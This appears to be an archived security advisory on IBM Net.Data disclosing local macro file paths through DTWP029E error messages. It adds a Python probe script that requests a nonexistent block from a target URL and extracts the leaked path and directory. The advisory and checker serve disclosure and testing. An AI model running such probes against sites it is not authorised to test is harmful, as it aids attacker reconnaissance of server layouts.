IBM Net.Data disclose local path of server files



    IBM Net.Data


    Chad Kalmes found the following.   Not sure if this is exactly a new
    issue or not, but IBM's Net.Data package (often used in conjunction
    with  NetCommerce3  and  db2www)  will  disclose the local path of
    server files if  fed improper requests.   This software is  in use
    on a variety of sites, including several online-shopping locales.

    Example (from  IBM's own  pages):   By issuing  a /report  request
    from the document.d2w file, the db2www package builds and displays
    the proper HTML page, as requested.

    Valid call:

    yields the proper web page.

    However, by issuing a bad /show request (or /garbage,  /whatever,
    etc.),  the  package  outputs  an  error message showing the local
    path  to  the  d2w  macro  file,  assuming no valid /show function
    exists within the .d2w file.

    Invalid call:


        DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w.

    While not  a security  problem per  se, it  still yields increased
    information  about  the  local  host  system.   This  'feature' or
    'flaw' is present  on both *NIX  and WIN versions  of the software
    (unsure about OS2) and every  instance I've found on the  Internet
    is subject  to this  disclosure.   Path disclosure vulnerabilities
    have been highlighted in other packages.
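    The check described above, automated, as an added example that is not
    part of the original report and not IBM code.  It requests a block name
    that does not exist in a .d2w macro and parses the DTWP029E message for
    the disclosed file path and macro directory.  The macro URL form
    (http://host/cgi-bin/db2www/document.d2w) and the block name
    "nosuchblock" are assumptions; the sample response bodies are
    constructed for the offline demonstration and were not captured from a
    live Net.Data host.

```python
import re
import sys
import urllib.error
import urllib.request

# Net.Data error DTWP029E as quoted in the advisory: the block name and the
# absolute path of the macro file on the server are both echoed to the client.
DTWP029E_RE = re.compile(
    r"DTWP029E:\s*Net\.Data is unable to locate the HTML block\s+(\S+)\s+in file\s+(\S+)"
)

# Constructed sample responses (not captured from a live host). The error line
# is the one shown in the advisory; the surrounding HTML is made up.
SAMPLE_DISCLOSING_RESPONSE = """<html><body>
DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w.
</body></html>"""

SAMPLE_CLEAN_RESPONSE = "<html><body><h1>Software library</h1><p>report output</p></body></html>"


def find_path_disclosure(body):
    """Return {'block', 'path', 'directory'} if DTWP029E is present, else None.

    The '.' after the path is sentence punctuation in the Net.Data message,
    not part of the file name, so it is stripped before the path is returned.
    """
    m = DTWP029E_RE.search(body)
    if not m:
        return None
    block, path = m.group(1), m.group(2).rstrip(".")
    # The directory holding the .d2w macros is usually the more useful fact
    # for an attacker than the single file name.
    directory = path.rsplit("/", 1)[0] if "/" in path else ""
    return {"block": block, "path": path, "directory": directory}


def build_probe_url(macro_url, block="nosuchblock"):
    """Append a block name that should not exist to a .d2w macro URL.

    macro_url is assumed to point at the macro itself, e.g.
    http://host/cgi-bin/db2www/document.d2w (assumed CGI path), so the probe
    becomes .../document.d2w/nosuchblock, the shape of the bad /show request
    in the advisory.
    """
    return macro_url.rstrip("/") + "/" + block


def probe(macro_url, block="nosuchblock", timeout=10):
    """Request a non-existent block and report any disclosed path.

    The error may come back with a 200 or with an HTTP error status, so the
    body of an HTTPError is inspected as well. Not verified against a live
    Net.Data installation.
    """
    url = build_probe_url(macro_url, block)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("latin-1", "replace")
    return find_path_disclosure(body)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # python netdata_probe.py http://host/cgi-bin/db2www/document.d2w
        result = probe(sys.argv[1])
    else:
        # Offline demonstration on the constructed sample response.
        result = find_path_disclosure(SAMPLE_DISCLOSING_RESPONSE)
    print(result)
```

    A non-match is a weak negative: the site may simply use a different
    error page, so an absent DTWP029E line does not prove the macro
    directory is hidden.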


    Nothing yet.

